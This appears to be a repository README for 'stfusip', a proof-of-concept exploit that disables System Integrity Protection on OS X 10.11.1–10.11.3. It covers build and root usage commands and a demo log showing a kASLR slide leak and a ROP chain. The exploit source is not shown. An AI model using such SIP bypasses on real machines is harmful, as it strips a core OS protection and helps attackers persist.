stfusip

by jndok

jndok /stfusip

System Integrity Protection (SIP) bypass for OSX 10.11.1 - 10.11.2 - 10.11.3

132 Stars 21 Forks Last release: Not found 7 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:

stfusip

credits & thanks

  • jndok – a.k.a. myself, for code and exploit.
  • qwertyoruiop – for bug and related help! go follow him on Twitter :)

compile

Simply do

make
, inside
stfusip
folder. If you encounter linking problems, be sure to check that you have capstone installed on your system. There is a flag inside
Makefile
to specify capstone's
include
directory, be sure to edit it if capstone is located elsewhere on your system!

If you don't have capstone installed, do:

brew install capstone
and you should be set.

usage

So,

stfusip
is a simple poc for disabling/enabling SIP, a.k.a. System Integrity Protection, a.k.a. rootless on OSX 10.11.1. Bug could theoretically still work on 10.11.2, but I am really not sure.

Super easy to use, needs to be run as root!:

sudo ./stfusip disable /* this disables SIP */
sudo ./stfusip enable  /* this enables SIP */

Here's a demo output:

jndoks-Mac-Pro:stfusip jndok$ sudo su
sh-3.2# whoami
root
sh-3.2# touch /System/yolo
touch: /System/yolo: Operation not permitted
sh-3.2# ./stfusip disable
[+] kaslr slide is: 0x0000000c600000
[+] built ROP chain @ 0xbff56c90 (mapped @ 0x261)!
[+] trigger set: 0x18 : 0xffffff800c8c41bf

[-] System Integrity Protection (SIP) has been disabled. sh-3.2# touch /System/yolo sh-3.2# ls -ls /System/ total 0 0 drwxr-xr-x 74 root wheel 2516 Dec 7 09:43 Library 0 -rw-r--r-- 1 root wheel 0 Dec 7 15:46 yolo sh-3.2# rm -rf /System/yolo sh-3.2# ls -ls /System/ total 0 0 drwxr-xr-x 74 root wheel 2516 Dec 7 09:43 Library sh-3.2# ./stfusip enable [+] kaslr slide is: 0x0000000c600000 [+] built ROP chain @ 0xbfff6c90 (mapped @ 0x261)! [+] trigger set: 0x18 : 0xffffff800c8c41bf

touch: /System/test: Operation not permitted [+] System Integrity Protection (SIP) has been enabled. sh-3.2# touch /System/yolo touch: /System/yolo: Operation not permitted sh-3.2# exit

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.